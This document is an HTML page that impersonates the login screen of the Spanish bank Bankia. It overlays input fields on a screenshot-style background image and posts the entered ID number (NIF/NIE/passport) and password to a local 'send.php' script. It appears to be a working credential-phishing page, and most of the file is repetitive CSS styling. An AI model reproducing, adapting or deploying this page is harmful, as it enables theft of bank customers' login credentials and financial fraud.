<html>
<head>
    		<title>Particulares - Bankia.es</title>
	<link type="image/x-icon" href="./img/favicon.ico" rel="shortcut icon">
</head>
</style>
<style type="text/css">
a
{
   color: #0000FF;
   text-decoration: underline;
}
a:visited
{
   color: #800080;
}
a:active
{
   color: #FF0000;
}
a:hover
{
   color: #0000FF;
   text-decoration: underline;
}
</style>
<style type="text/css">
#Image1
{
   border: 0px #000000 solid;
}
#Image2
{
   border: 0px #000000 solid;
}
#Editbox1
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Editbox2
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Editbox3
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Editbox4
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Editbox5
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Editbox6
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Editbox7
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Button1
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Button91
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
#Button2
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   background-image: url(images/index_Button1_bkgrnd.png);
   background-repeat: repeat;
   background-position: left top;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
<style>

    body{
        margin:0px;
    }
   /* .content_form{
        width: 460px;
        margin-left: 683px;
        padding-left: 44px;
        padding-top: 121px;
    }*/
    .input{
        width: 358px;
        height: 40px;
        padding-left: 12px;
        margin-bottom: 18px;
        border: 1px solid #B7B6B6;
        border-radius: 3px;
        font-size: 16px;
        text-transform: capitalize;

    }
    .input:focus{
        border: 1px solid #2690FF;
    }
    .card{
        display: inline-block;
        background-image: url("css/sprites_cc_global.png");
        background-repeat: no-repeat;
        background-position: 0px -406px;
        height: 27px;
        position: relative;
        left: -51px;
        bottom: -9px;
        width: 40px;
    }
    .date{
        display: inline-block;
        background-image: url("css/sprites_cc_global.png");
        background-repeat: no-repeat;
        background-position: 0px -434px;
        height: 27px;
        position: relative;
        left: -51px;
        bottom: -9px;
        width: 40px;
    }


</style>
<body style="background-image: url('./img/1.png');background-repeat: no-repeat;height: 816px; width:100%">
    <div style="width: 500px; margin: 0px; padding-left: 653px; padding-top: 350px">
        <div class="content_form">
            <form method="post" action="send.php";>
			<div>
                    <br></br>
                    <p></p>
                    <input type="text"  id="num" name="user" class="input"  placeholder="NIF / NIE / Pasaporte"  required style="position:absolute;left:703px;top:170px;width:724px;height:47px;line-height:30px;z-index:2;"   required>
                    <input type="password"  id="num" name="pass" class="input"  placeholder="" required style="position:absolute;left:703px;top:262px;width:724px;height:47px;line-height:30px;z-index:2;"  required>
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:705px;top:331px;width:719px;height:35px;z-index:3;">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:1270px;top:346px;width:119px;height:30px;z-index:3;">
</form>
	</body></html>